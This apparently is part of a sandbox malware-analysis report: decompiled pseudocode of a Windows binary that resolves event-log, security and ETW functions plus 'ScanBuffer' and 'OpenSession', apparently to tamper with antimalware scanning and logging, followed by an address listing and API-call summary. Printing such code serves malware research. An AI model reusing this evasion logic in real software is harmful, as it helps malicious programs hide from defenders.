				E025236CC( *((intOrPtr*)(_t2075 - 0x98c)), _t1625, _t1864, _t2074);
				E02514A98(_t2075 - 0x990, "SetFileSecurityW");
				_push( *((intOrPtr*)(_t2075 - 0x990)));
				E02514A98(_t2075 - 0x994, "advapi32");
				_pop(_t1867);
				E025236CC( *((intOrPtr*)(_t2075 - 0x994)), _t1625, _t1867, _t2074);
				E02514A98(_t2075 - 0x998, "SetFileSecurityA");
				_push( *((intOrPtr*)(_t2075 - 0x998)));
				E02514A98(_t2075 - 0x99c, "advapi32");
				_pop(_t1870);
				E025236CC( *((intOrPtr*)(_t2075 - 0x99c)), _t1625, _t1870, _t2074);
				E02514A98(_t2075 - 0x9a0, "SaferSetPolicyInformation");
				_push( *((intOrPtr*)(_t2075 - 0x9a0)));
				E02514A98(_t2075 - 0x9a4, "advapi32");
				_pop(_t1873);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9a4)), _t1625, _t1873, _t2074);
				E02514A98(_t2075 - 0x9a8, "SaferSetLevelInformation");
				_push( *((intOrPtr*)(_t2075 - 0x9a8)));
				E02514A98(_t2075 - 0x9ac, "advapi32");
				_pop(_t1876);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9ac)), _t1625, _t1876, _t2074);
				E02514A98(_t2075 - 0x9b0, "ReportEventW");
				_push( *((intOrPtr*)(_t2075 - 0x9b0)));
				E02514A98(_t2075 - 0x9b4, "advapi32");
				_pop(_t1879);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9b4)), _t1625, _t1879, _t2074);
				E02514A98(_t2075 - 0x9b8, "ReportEventA");
				_push( *((intOrPtr*)(_t2075 - 0x9b8)));
				E02514A98(_t2075 - 0x9bc, "advapi32");
				_pop(_t1882);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9bc)), _t1625, _t1882, _t2074);
				E02514A98(_t2075 - 0x9c0, "ReadEventLogW");
				_push( *((intOrPtr*)(_t2075 - 0x9c0)));
				E02514A98(_t2075 - 0x9c4, "advapi32");
				_pop(_t1885);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9c4)), _t1625, _t1885, _t2074);
				E02514A98(_t2075 - 0x9c8, "ReadEventLogA");
				_push( *((intOrPtr*)(_t2075 - 0x9c8)));
				E02514A98(_t2075 - 0x9cc, "advapi32");
				_pop(_t1888);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9cc)), _t1625, _t1888, _t2074);
				E02514A98(_t2075 - 0x9d0, "OpenEventLogW");
				_push( *((intOrPtr*)(_t2075 - 0x9d0)));
				E02514A98(_t2075 - 0x9d4, "advapi32");
				_pop(_t1891);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9d4)), _t1625, _t1891, _t2074);
				E02514A98(_t2075 - 0x9d8, "OpenEventLogA");
				_push( *((intOrPtr*)(_t2075 - 0x9d8)));
				E02514A98(_t2075 - 0x9dc, "advapi32");
				_pop(_t1894);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9dc)), _t1625, _t1894, _t2074);
				E02514A98(_t2075 - 0x9e0, "SaferRecordEventLogEntry");
				_push( *((intOrPtr*)(_t2075 - 0x9e0)));
				E02514A98(_t2075 - 0x9e4, "advapi32");
				_pop(_t1897);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9e4)), _t1625, _t1897, _t2074);
				E02514A98(_t2075 - 0x9e8, "GetEventLogInformation");
				_push( *((intOrPtr*)(_t2075 - 0x9e8)));
				E02514A98(_t2075 - 0x9ec, "advapi32");
				_pop(_t1900);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9ec)), _t1625, _t1900, _t2074);
				E02514A98(_t2075 - 0x9f0, "ElfReadEventLogW");
				_push( *((intOrPtr*)(_t2075 - 0x9f0)));
				E02514A98(_t2075 - 0x9f4, "advapi32");
				_pop(_t1903);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9f4)), _t1625, _t1903, _t2074);
				E02514A98(_t2075 - 0x9f8, "ElfReadEventLogA");
				_push( *((intOrPtr*)(_t2075 - 0x9f8)));
				E02514A98(_t2075 - 0x9fc, "advapi32");
				_pop(_t1906);
				E025236CC( *((intOrPtr*)(_t2075 - 0x9fc)), _t1625, _t1906, _t2074);
				E02514A98(_t2075 - 0xa00, "ElfOpenEventLogW");
				_push( *((intOrPtr*)(_t2075 - 0xa00)));
				E02514A98(_t2075 - 0xa04, "advapi32");
				_pop(_t1909);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa04)), _t1625, _t1909, _t2074);
				E02514A98(_t2075 - 0xa08, "ElfOpenEventLogA");
				_push( *((intOrPtr*)(_t2075 - 0xa08)));
				E02514A98(_t2075 - 0xa0c, "advapi32");
				_pop(_t1912);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa0c)), _t1625, _t1912, _t2074);
				E02514A98(_t2075 - 0xa10, "BuildSecurityDescriptorA");
				_push( *((intOrPtr*)(_t2075 - 0xa10)));
				E02514A98(_t2075 - 0xa14, "advapi32");
				_pop(_t1915);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa14)), _t1625, _t1915, _t2074);
				E02514A98(_t2075 - 0xa18, "BuildImpersonateTrusteeW");
				_push( *((intOrPtr*)(_t2075 - 0xa18)));
				E02514A98(_t2075 - 0xa1c, "advapi32");
				_pop(_t1918);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa1c)), _t1625, _t1918, _t2074);
				E02514A98(_t2075 - 0xa20, "BuildSecurityDescriptorW");
				_push( *((intOrPtr*)(_t2075 - 0xa20)));
				E02514A98(_t2075 - 0xa24, "advapi32");
				_pop(_t1921);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa24)), _t1625, _t1921, _t2074);
				E02514A98(_t2075 - 0xa28, "AccessCheckByType");
				_push( *((intOrPtr*)(_t2075 - 0xa28)));
				E02514A98(_t2075 - 0xa2c, "advapi32");
				_pop(_t1924);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa2c)), _t1625, _t1924, _t2074);
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanBuffer");
				E02514C24();
				E02514A98(_t2075 - 0xa30, E02514D64( *((intOrPtr*)(_t2075 - 0xa34))));
				_push( *((intOrPtr*)(_t2075 - 0xa30)));
				_t1654 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0xa3c, _t1654, 0x252ad5c);
				E02514A98(_t2075 - 0xa38, E02514D64( *((intOrPtr*)(_t2075 - 0xa3c))));
				_pop(_t1929); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0xa38)), _t1625, _t1929, _t2074); // executed
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("OpenSession");
				E02514C24();
				E02514A98(_t2075 - 0xa40, E02514D64( *((intOrPtr*)(_t2075 - 0xa44))));
				_push( *((intOrPtr*)(_t2075 - 0xa40)));
				_t1655 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0xa4c, _t1655, 0x252ad5c);
				E02514A98(_t2075 - 0xa48, E02514D64( *((intOrPtr*)(_t2075 - 0xa4c))));
				_pop(_t1934); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0xa48)), _t1625, _t1934, _t2074); // executed
				E02514A98(_t2075 - 0xa50, "NtCreateFile");
				_push( *((intOrPtr*)(_t2075 - 0xa50)));
				E02514A98(_t2075 - 0xa54, "ntdll");
				_pop(_t1937); // executed
				E025236CC( *((intOrPtr*)(_t2075 - 0xa54)), _t1625, _t1937, _t2074); // executed
				E02514A98(_t2075 - 0xa58, "EtwEventWriteEx");
				_push( *((intOrPtr*)(_t2075 - 0xa58)));
				E02514A98(_t2075 - 0xa5c, "ntdll");
				_pop(_t1940);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa5c)), _t1625, _t1940, _t2074);
				E02514A98(_t2075 - 0xa60, "NtOpenFile");
				_push( *((intOrPtr*)(_t2075 - 0xa60)));
				E02514A98(_t2075 - 0xa64, "ntdll");
				_pop(_t1943);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa64)), _t1625, _t1943, _t2074);
				E02514A98(_t2075 - 0xa68, "EtwEventWrite");
				_push( *((intOrPtr*)(_t2075 - 0xa68)));
				E02514A98(_t2075 - 0xa6c, "ntdll");
				_pop(_t1946);
				E025236CC( *((intOrPtr*)(_t2075 - 0xa6c)), _t1625, _t1946, _t2074);
				ExitProcess(0); // executed
				_pop(_t1947);
				 *[fs:eax] = _t1947;
				_push(E0252A8E4);
				E025148C4(_t2075 - 0xa6c, 0x64);
				E025148C4(_t2075 - 0x8dc, 0x63);
				E025148A0(_t2075 - 0x744);
				E025148C4(_t2075 - 0x750, 3);
				E025148C4(_t2075 - 0x740, 0x54);
				E025148C4(_t2075 - 0x4f0, 0xd);
				E025148C4(_t2075 - 0x4bc, 0x64);
				E025148C4(_t2075 - 0x32c, 5);
				_t1955 =  *0x25251f8; // 0x25251fc
				E02515A10(_t2075 - 0x318, _t1955);
				E025148C4(_t2075 - 0x314, 0x1e);
				_t1957 =  *0x25251f8; // 0x25251fc
				E02515A10(_t2075 - 0x29c, _t1957);
				E025148C4(_t2075 - 0x298, 8);
				_t1959 =  *0x25251f8; // 0x25251fc
				E02515A10(_t2075 - 0x278, _t1959);
				E025148C4(_t2075 - 0x274, 0x11);
				E025148C4(_t2075 - 0x22c, 0x24);
				E025148A0(_t2075 - 0x198);
				E025148A0(_t2075 - 0x19c);
				return E025148C4(_t2075 - 0x194, 0x4e);
			}












































































































































































                                                                0x0252874d
                                                                0x0252874d
                                                                0x0252874d
                                                                0x0252874d
                                                                0x02528752
                                                                0x02528757
                                                                0x02528767
                                                                0x0252877e
                                                                0x02528793
                                                                0x025287a3
                                                                0x025287a8
                                                                0x025287ae
                                                                0x025287b3
                                                                0x025287b8
                                                                0x025287be
                                                                0x025287c3
                                                                0x025287c9
                                                                0x025287d9
                                                                0x025287f0
                                                                0x02528805
                                                                0x02528815
                                                                0x0252881a
                                                                0x02528820
                                                                0x02528825
                                                                0x0252882a
                                                                0x0252882f
                                                                0x02528835
                                                                0x02528845
                                                                0x0252885d
                                                                0x02528868
                                                                0x0252886f
                                                                0x0252887a
                                                                0x02528892
                                                                0x0252889d
                                                                0x0252889e
                                                                0x025288a3
                                                                0x025288a9
                                                                0x025288ae
                                                                0x025288be
                                                                0x025288d5
                                                                0x025288ea
                                                                0x025288fa
                                                                0x025288ff
                                                                0x02528905
                                                                0x0252890a
                                                                0x0252890f
                                                                0x02528915
                                                                0x0252891a
                                                                0x0252892a
                                                                0x02528941
                                                                0x02528956
                                                                0x02528966
                                                                0x0252896b
                                                                0x02528971
                                                                0x02528976
                                                                0x0252897b
                                                                0x0252898d
                                                                0x02528998
                                                                0x0252899d
                                                                0x0252899f
                                                                0x025289a5
                                                                0x025289aa
                                                                0x025289b0
                                                                0x025289c0
                                                                0x025289d8
                                                                0x025289e3
                                                                0x025289ea
                                                                0x025289f5
                                                                0x02528a0d
                                                                0x02528a18
                                                                0x02528a19
                                                                0x02528a1e
                                                                0x02528a23
                                                                0x02528a30
                                                                0x02528a42
                                                                0x02528a4c
                                                                0x02528a51
                                                                0x02528a63
                                                                0x02528a6e
                                                                0x02528a80
                                                                0x02528a88
                                                                0x02528a8b
                                                                0x02528a9d
                                                                0x02528aa8
                                                                0x02528aba
                                                                0x02528ac2
                                                                0x02528ac5
                                                                0x02528ad7
                                                                0x02528ae2
                                                                0x02528af4
                                                                0x02528afc
                                                                0x02528aff
                                                                0x02528b11
                                                                0x02528b1c
                                                                0x02528b2e
                                                                0x02528b36
                                                                0x02528b39
                                                                0x02528b4b
                                                                0x02528b50
                                                                0x02528b56
                                                                0x02528b68
                                                                0x02528b70
                                                                0x02528b73
                                                                0x02528b85
                                                                0x02528b90
                                                                0x02528b9c
                                                                0x02528ba4
                                                                0x02528ba6
                                                                0x02528ba6
                                                                0x02528ba7
                                                                0x02528ba7
                                                                0x02528baa
                                                                0x02528baf
                                                                0x02528bb5
                                                                0x02528bc5
                                                                0x02528bdd
                                                                0x02528be8
                                                                0x02528bef
                                                                0x02528bfa
                                                                0x02528c12
                                                                0x02528c1d
                                                                0x02528c1e
                                                                0x02528c23
                                                                0x02528c28
                                                                0x02528c2e
                                                                0x02528c3e
                                                                0x02528c56
                                                                0x02528c61
                                                                0x02528c68
                                                                0x02528c73
                                                                0x02528c8b
                                                                0x02528c96
                                                                0x02528c97
                                                                0x02528c9c
                                                                0x02528ca1
                                                                0x02528ca7
                                                                0x02528cb7
                                                                0x02528ccf
                                                                0x02528cda
                                                                0x02528ce1
                                                                0x02528cec
                                                                0x02528d04
                                                                0x02528d0f
                                                                0x02528d10
                                                                0x02528d1b
                                                                0x02528d21
                                                                0x02528d26
                                                                0x02528d36
                                                                0x02528d3b
                                                                0x02528d40
                                                                0x02528d47
                                                                0x02528d4d
                                                                0x02528d52
                                                                0x02528d62
                                                                0x02528d6d
                                                                0x02528d72
                                                                0x02528d83
                                                                0x02528d93
                                                                0x02528d98
                                                                0x02528d9d
                                                                0x02528da3
                                                                0x02528db3
                                                                0x02528dcb
                                                                0x02528dd6
                                                                0x02528ddd
                                                                0x02528de8
                                                                0x02528e00
                                                                0x02528e0b
                                                                0x02528e0c
                                                                0x02528e11
                                                                0x02528e16
                                                                0x02528e1c
                                                                0x02528e2c
                                                                0x02528e44
                                                                0x02528e4f
                                                                0x02528e56
                                                                0x02528e61
                                                                0x02528e79
                                                                0x02528e84
                                                                0x02528e85
                                                                0x02528e8a
                                                                0x02528e8f
                                                                0x02528e95
                                                                0x02528ea5
                                                                0x02528ebd
                                                                0x02528ec8
                                                                0x02528ecf
                                                                0x02528eda
                                                                0x02528ef2
                                                                0x02528efd
                                                                0x02528efe
                                                                0x02528f03
                                                                0x02528f08
                                                                0x02528f0e
                                                                0x02528f1e
                                                                0x02528f36
                                                                0x02528f41
                                                                0x02528f48
                                                                0x02528f53
                                                                0x02528f6b
                                                                0x02528f76
                                                                0x02528f77
                                                                0x02528f7c
                                                                0x02528f81
                                                                0x02528f87
                                                                0x02528f97
                                                                0x02528faf
                                                                0x02528fba
                                                                0x02528fc1
                                                                0x02528fcc
                                                                0x02528fe4
                                                                0x02528fef
                                                                0x02528ff0
                                                                0x02528ff5
                                                                0x02528fff
                                                                0x02529004
                                                                0x0252900a
                                                                0x02529014
                                                                0x02529019
                                                                0x0252901f
                                                                0x02529029
                                                                0x0252902e
                                                                0x02529034
                                                                0x02529039
                                                                0x0252903f
                                                                0x0252904f
                                                                0x02529067
                                                                0x02529072
                                                                0x02529079
                                                                0x02529084
                                                                0x0252909c
                                                                0x025290a7
                                                                0x025290a8
                                                                0x025290ad
                                                                0x025290b2
                                                                0x025290b8
                                                                0x025290c8
                                                                0x025290e0
                                                                0x025290eb
                                                                0x025290f2
                                                                0x025290fd
                                                                0x02529115
                                                                0x02529120
                                                                0x02529121
                                                                0x02529126
                                                                0x0252912b
                                                                0x02529131
                                                                0x02529136
                                                                0x02529138
                                                                0x0252913d
                                                                0x0252913f
                                                                0x02529144
                                                                0x02529146
                                                                0x02529156
                                                                0x0252916e
                                                                0x02529179
                                                                0x02529180
                                                                0x0252918b
                                                                0x025291a3
                                                                0x025291ae
                                                                0x025291af
                                                                0x025291bf
                                                                0x025291ca
                                                                0x025291d6
                                                                0x025291e1
                                                                0x025291e2
                                                                0x025291e7
                                                                0x025291ec
                                                                0x025291f2
                                                                0x02529202
                                                                0x0252921a
                                                                0x02529225
                                                                0x0252922c
                                                                0x02529237
                                                                0x0252924f
                                                                0x0252925a
                                                                0x0252925b
                                                                0x0252926b
                                                                0x02529276
                                                                0x02529282
                                                                0x0252928d
                                                                0x0252928e
                                                                0x02529293
                                                                0x02529298
                                                                0x0252929e
                                                                0x025292ae
                                                                0x025292c6
                                                                0x025292d1
                                                                0x025292d8
                                                                0x025292e3
                                                                0x025292fb
                                                                0x02529306
                                                                0x02529307
                                                                0x02529317
                                                                0x02529322
                                                                0x0252932e
                                                                0x02529339
                                                                0x0252933a
                                                                0x02529349
                                                                0x02529349
                                                                0x0252902e
                                                                0x02529019
                                                                0x0252934e
                                                                0x02529353
                                                                0x02529359
                                                                0x02529369
                                                                0x02529381
                                                                0x0252938c
                                                                0x02529393
                                                                0x0252939e
                                                                0x025293b6
                                                                0x025293c1
                                                                0x025293c2
                                                                0x025293c7
                                                                0x025293d1
                                                                0x025293d6
                                                                0x025293dc
                                                                0x025293e6
                                                                0x025293eb
                                                                0x025293f1
                                                                0x025293fb
                                                                0x02529400
                                                                0x02529406
                                                                0x0252940b
                                                                0x02529411
                                                                0x02529421
                                                                0x02529439
                                                                0x02529444
                                                                0x0252944b
                                                                0x02529456
                                                                0x0252946e
                                                                0x02529479
                                                                0x0252947a
                                                                0x0252947f
                                                                0x02529484
                                                                0x0252948a
                                                                0x0252949a
                                                                0x025294b2
                                                                0x025294bd
                                                                0x025294c4
                                                                0x025294cf
                                                                0x025294e7
                                                                0x025294f2
                                                                0x025294f3
                                                                0x025294ff
                                                                0x0252950e
                                                                0x02529513
                                                                0x02529525
                                                                0x0252952a
                                                                0x0252952f
                                                                0x02529530
                                                                0x02529535
                                                                0x0252953a
                                                                0x02529540
                                                                0x02529550
                                                                0x02529568
                                                                0x02529573
                                                                0x0252957a
                                                                0x02529585
                                                                0x0252959d
                                                                0x025295a8
                                                                0x025295a9
                                                                0x025295b3
                                                                0x025295ba
                                                                0x025295bf
                                                                0x025295c4
                                                                0x025295c9
                                                                0x025295cf
                                                                0x025295df
                                                                0x025295f7
                                                                0x02529602
                                                                0x02529609
                                                                0x02529614
                                                                0x0252962c
                                                                0x02529637
                                                                0x02529638
                                                                0x02529648
                                                                0x02529653
                                                                0x0252965f
                                                                0x0252966a
                                                                0x0252966b
                                                                0x02529670
                                                                0x02529675
                                                                0x0252967b
                                                                0x0252968b
                                                                0x025296a3
                                                                0x025296ae
                                                                0x025296b5
                                                                0x025296c0
                                                                0x025296d8
                                                                0x025296e3
                                                                0x025296e4
                                                                0x025296f4
                                                                0x025296ff
                                                                0x0252970b
                                                                0x02529716
                                                                0x02529717
                                                                0x0252971c
                                                                0x02529721
                                                                0x02529727
                                                                0x02529737
                                                                0x0252974f
                                                                0x0252975a
                                                                0x02529761
                                                                0x0252976c
                                                                0x02529784
                                                                0x0252978f
                                                                0x02529790
                                                                0x025297a0
                                                                0x025297ab
                                                                0x025297b7
                                                                0x025297c2
                                                                0x025297c3
                                                                0x025297c8
                                                                0x025297cd
                                                                0x025297d3
                                                                0x025297e3
                                                                0x025297fb
                                                                0x02529806
                                                                0x0252980d
                                                                0x02529818
                                                                0x02529830
                                                                0x0252983b
                                                                0x0252983c
                                                                0x0252983c
                                                                0x02529400
                                                                0x025293eb
                                                                0x02529841
                                                                0x02529846
                                                                0x0252984c
                                                                0x0252985c
                                                                0x02529874
                                                                0x0252987f
                                                                0x02529886
                                                                0x02529891
                                                                0x025298a9
                                                                0x025298b4
                                                                0x025298b5
                                                                0x025298ba
                                                                0x025298c4
                                                                0x025298c9
                                                                0x025298cf
                                                                0x025298d9
                                                                0x025298de
                                                                0x025298e4
                                                                0x025298ee
                                                                0x025298f3
                                                                0x025298f9
                                                                0x025298fe
                                                                0x02529904
                                                                0x02529914
                                                                0x0252992c
                                                                0x02529937
                                                                0x0252993e
                                                                0x02529949
                                                                0x02529961
                                                                0x0252996c
                                                                0x0252996d
                                                                0x02529972
                                                                0x02529977
                                                                0x0252997d
                                                                0x0252998d
                                                                0x025299a5
                                                                0x025299b0
                                                                0x025299b7
                                                                0x025299c2
                                                                0x025299da
                                                                0x025299e5
                                                                0x025299e6
                                                                0x025299f3
                                                                0x025299fe
                                                                0x02529a04
                                                                0x02529a0b
                                                                0x02529a0c
                                                                0x02529a0c
                                                                0x025298f3
                                                                0x025298de
                                                                0x02529a11
                                                                0x02529a16
                                                                0x02529a1c
                                                                0x02529a21
                                                                0x02529a23
                                                                0x02529a28
                                                                0x02529a2a
                                                                0x02529a2f
                                                                0x02529a31
                                                                0x02529a41
                                                                0x02529a59
                                                                0x02529a64
                                                                0x02529a6b
                                                                0x02529a76
                                                                0x02529a8e
                                                                0x02529a99
                                                                0x02529a9a
                                                                0x02529aaa
                                                                0x02529ab5
                                                                0x02529ac1
                                                                0x02529acc
                                                                0x02529acd
                                                                0x02529ad2
                                                                0x02529ad7
                                                                0x02529add
                                                                0x02529aed
                                                                0x02529b05
                                                                0x02529b10
                                                                0x02529b17
                                                                0x02529b22
                                                                0x02529b3a
                                                                0x02529b45
                                                                0x02529b46
                                                                0x02529b56
                                                                0x02529b61
                                                                0x02529b6d
                                                                0x02529b78
                                                                0x02529b79
                                                                0x02529b7e
                                                                0x02529b83
                                                                0x02529b89
                                                                0x02529b99
                                                                0x02529bb1
                                                                0x02529bbc
                                                                0x02529bc3
                                                                0x02529bce
                                                                0x02529be6
                                                                0x02529bf1
                                                                0x02529bf2
                                                                0x02529c02
                                                                0x02529c0d
                                                                0x02529c19
                                                                0x02529c24
                                                                0x02529c25
                                                                0x02529c2a
                                                                0x02529c2f
                                                                0x02529c35
                                                                0x02529c45
                                                                0x02529c5d
                                                                0x02529c68
                                                                0x02529c6f
                                                                0x02529c7a
                                                                0x02529c92
                                                                0x02529c9d
                                                                0x02529c9e
                                                                0x02529cae
                                                                0x02529cb9
                                                                0x02529cc5
                                                                0x02529cd0
                                                                0x02529cd1
                                                                0x02529ce1
                                                                0x02529cec
                                                                0x02529cf8
                                                                0x02529d03
                                                                0x02529d04
                                                                0x02529d09
                                                                0x02529d0e
                                                                0x02529d14
                                                                0x02529d24
                                                                0x02529d3c
                                                                0x02529d47
                                                                0x02529d4e
                                                                0x02529d59
                                                                0x02529d71
                                                                0x02529d7c
                                                                0x02529d7d
                                                                0x02529d82
                                                                0x02529d87
                                                                0x02529d8d
                                                                0x02529d9d
                                                                0x02529db5
                                                                0x02529dc0
                                                                0x02529dc7
                                                                0x02529dd2
                                                                0x02529dea
                                                                0x02529df5
                                                                0x02529df6
                                                                0x02529e06
                                                                0x02529e11
                                                                0x02529e1d
                                                                0x02529e28
                                                                0x02529e29
                                                                0x02529e39
                                                                0x02529e44
                                                                0x02529e50
                                                                0x02529e5b
                                                                0x02529e5c
                                                                0x02529e6c
                                                                0x02529e77
                                                                0x02529e83
                                                                0x02529e8e
                                                                0x02529e8f
                                                                0x02529e9f
                                                                0x02529eaa
                                                                0x02529eb6
                                                                0x02529ec1
                                                                0x02529ec2
                                                                0x02529ed2
                                                                0x02529edd
                                                                0x02529ee9
                                                                0x02529ef4
                                                                0x02529ef5
                                                                0x02529f05
                                                                0x02529f10
                                                                0x02529f1c
                                                                0x02529f27
                                                                0x02529f28
                                                                0x02529f38
                                                                0x02529f43
                                                                0x02529f4f
                                                                0x02529f5a
                                                                0x02529f5b
                                                                0x02529f6b
                                                                0x02529f76
                                                                0x02529f82
                                                                0x02529f8d
                                                                0x02529f8e
                                                                0x02529f9e
                                                                0x02529fa9
                                                                0x02529fb5
                                                                0x02529fc0
                                                                0x02529fc1
                                                                0x02529fd1
                                                                0x02529fdc
                                                                0x02529fe8
                                                                0x02529ff3
                                                                0x02529ff4
                                                                0x0252a004
                                                                0x0252a00f
                                                                0x0252a01b
                                                                0x0252a026
                                                                0x0252a027
                                                                0x0252a037
                                                                0x0252a042
                                                                0x0252a04e
                                                                0x0252a059
                                                                0x0252a05a
                                                                0x0252a06a
                                                                0x0252a075
                                                                0x0252a081
                                                                0x0252a08c
                                                                0x0252a08d
                                                                0x0252a09d
                                                                0x0252a0a8
                                                                0x0252a0b4
                                                                0x0252a0bf
                                                                0x0252a0c0
                                                                0x0252a0d0
                                                                0x0252a0db
                                                                0x0252a0e7
                                                                0x0252a0f2
                                                                0x0252a0f3
                                                                0x0252a103
                                                                0x0252a10e
                                                                0x0252a11a
                                                                0x0252a125
                                                                0x0252a126
                                                                0x0252a136
                                                                0x0252a141
                                                                0x0252a14d
                                                                0x0252a158
                                                                0x0252a159
                                                                0x0252a169
                                                                0x0252a174
                                                                0x0252a180
                                                                0x0252a18b
                                                                0x0252a18c
                                                                0x0252a19c
                                                                0x0252a1a7
                                                                0x0252a1b3
                                                                0x0252a1be
                                                                0x0252a1bf
                                                                0x0252a1cf
                                                                0x0252a1da
                                                                0x0252a1e6
                                                                0x0252a1f1
                                                                0x0252a1f2
                                                                0x0252a202
                                                                0x0252a20d
                                                                0x0252a219
                                                                0x0252a224
                                                                0x0252a225
                                                                0x0252a235
                                                                0x0252a240
                                                                0x0252a24c
                                                                0x0252a257
                                                                0x0252a258
                                                                0x0252a268
                                                                0x0252a273
                                                                0x0252a27f
                                                                0x0252a28a
                                                                0x0252a28b
                                                                0x0252a29b
                                                                0x0252a2a6
                                                                0x0252a2b2
                                                                0x0252a2bd
                                                                0x0252a2be
                                                                0x0252a2ce
                                                                0x0252a2d9
                                                                0x0252a2e5
                                                                0x0252a2f0
                                                                0x0252a2f1
                                                                0x0252a301
                                                                0x0252a30c
                                                                0x0252a318
                                                                0x0252a323
                                                                0x0252a324
                                                                0x0252a334
                                                                0x0252a33f
                                                                0x0252a34b
                                                                0x0252a356
                                                                0x0252a357
                                                                0x0252a367
                                                                0x0252a372
                                                                0x0252a37e
                                                                0x0252a389
                                                                0x0252a38a
                                                                0x0252a39a
                                                                0x0252a3a5
                                                                0x0252a3b1
                                                                0x0252a3bc
                                                                0x0252a3bd
                                                                0x0252a3cd
                                                                0x0252a3d8
                                                                0x0252a3e4
                                                                0x0252a3ef
                                                                0x0252a3f0
                                                                0x0252a400
                                                                0x0252a40b
                                                                0x0252a417
                                                                0x0252a422
                                                                0x0252a423
                                                                0x0252a433
                                                                0x0252a43e
                                                                0x0252a44a
                                                                0x0252a455
                                                                0x0252a456
                                                                0x0252a466
                                                                0x0252a471
                                                                0x0252a47d
                                                                0x0252a488
                                                                0x0252a489
                                                                0x0252a499
                                                                0x0252a4a4
                                                                0x0252a4b0
                                                                0x0252a4bb
                                                                0x0252a4bc
                                                                0x0252a4cc
                                                                0x0252a4d7
                                                                0x0252a4e3
                                                                0x0252a4ee
                                                                0x0252a4ef
                                                                0x0252a4ff
                                                                0x0252a50a
                                                                0x0252a516
                                                                0x0252a521
                                                                0x0252a522
                                                                0x0252a532
                                                                0x0252a53d
                                                                0x0252a549
                                                                0x0252a554
                                                                0x0252a555
                                                                0x0252a565
                                                                0x0252a570
                                                                0x0252a57c
                                                                0x0252a587
                                                                0x0252a588
                                                                0x0252a598
                                                                0x0252a5a3
                                                                0x0252a5af
                                                                0x0252a5ba
                                                                0x0252a5bb
                                                                0x0252a5cb
                                                                0x0252a5d6
                                                                0x0252a5e2
                                                                0x0252a5ed
                                                                0x0252a5ee
                                                                0x0252a5f3
                                                                0x0252a5f8
                                                                0x0252a5fe
                                                                0x0252a60e
                                                                0x0252a626
                                                                0x0252a631
                                                                0x0252a638
                                                                0x0252a643
                                                                0x0252a65b
                                                                0x0252a666
                                                                0x0252a667
                                                                0x0252a66c
                                                                0x0252a671
                                                                0x0252a677
                                                                0x0252a687
                                                                0x0252a69f
                                                                0x0252a6aa
                                                                0x0252a6b1
                                                                0x0252a6bc
                                                                0x0252a6d4
                                                                0x0252a6df
                                                                0x0252a6e0
                                                                0x0252a6f0
                                                                0x0252a6fb
                                                                0x0252a707
                                                                0x0252a712
                                                                0x0252a713
                                                                0x0252a723
                                                                0x0252a72e
                                                                0x0252a73a
                                                                0x0252a745
                                                                0x0252a746
                                                                0x0252a756
                                                                0x0252a761
                                                                0x0252a76d
                                                                0x0252a778
                                                                0x0252a779
                                                                0x0252a789
                                                                0x0252a794
                                                                0x0252a7a0
                                                                0x0252a7ab
                                                                0x0252a7ac
                                                                0x0252a7b3
                                                                0x0252a7ba
                                                                0x0252a7bd
                                                                0x0252a7c0
                                                                0x0252a7d0
                                                                0x0252a7e0
                                                                0x0252a7eb
                                                                0x0252a7fb
                                                                0x0252a80b
                                                                0x0252a81b
                                                                0x0252a82b
                                                                0x0252a83b
                                                                0x0252a846
                                                                0x0252a84c
                                                                0x0252a85c
                                                                0x0252a867
                                                                0x0252a86d
                                                                0x0252a87d
                                                                0x0252a888
                                                                0x0252a88e
                                                                0x0252a89e
                                                                0x0252a8ae
                                                                0x0252a8b9
                                                                0x0252a8c4
                                                                0x0252a8d9

                                                                APIs
                                                                  • Part of subcall function 02525698: _lcreat.KERNEL32(00000000,00000000), ref: 025256CF
                                                                  • Part of subcall function 02525698: _lwrite.KERNEL32(00000000,00000000,?,00000000,02525715), ref: 025256EF
                                                                  • Part of subcall function 02525698: _lclose.KERNEL32(00000000), ref: 025256F5
                                                                  • Part of subcall function 025236CC: GetModuleHandleA.KERNEL32(00000000,00000000,02523792), ref: 02523725
                                                                  • Part of subcall function 025236CC: GetProcAddress.KERNEL32(77CD0000,00000000), ref: 02523748
                                                                  • Part of subcall function 025236CC: FreeLibrary.KERNEL32(77CD0000,00000000,00000000,02523792), ref: 02523772
                                                                  • Part of subcall function 02518110: GetFileAttributesA.KERNEL32(00000000,?,02526AA4,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 0251811B
                                                                  • Part of subcall function 02525724: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252583C
                                                                  • Part of subcall function 02525724: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525853
                                                                  • Part of subcall function 02525724: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252585C
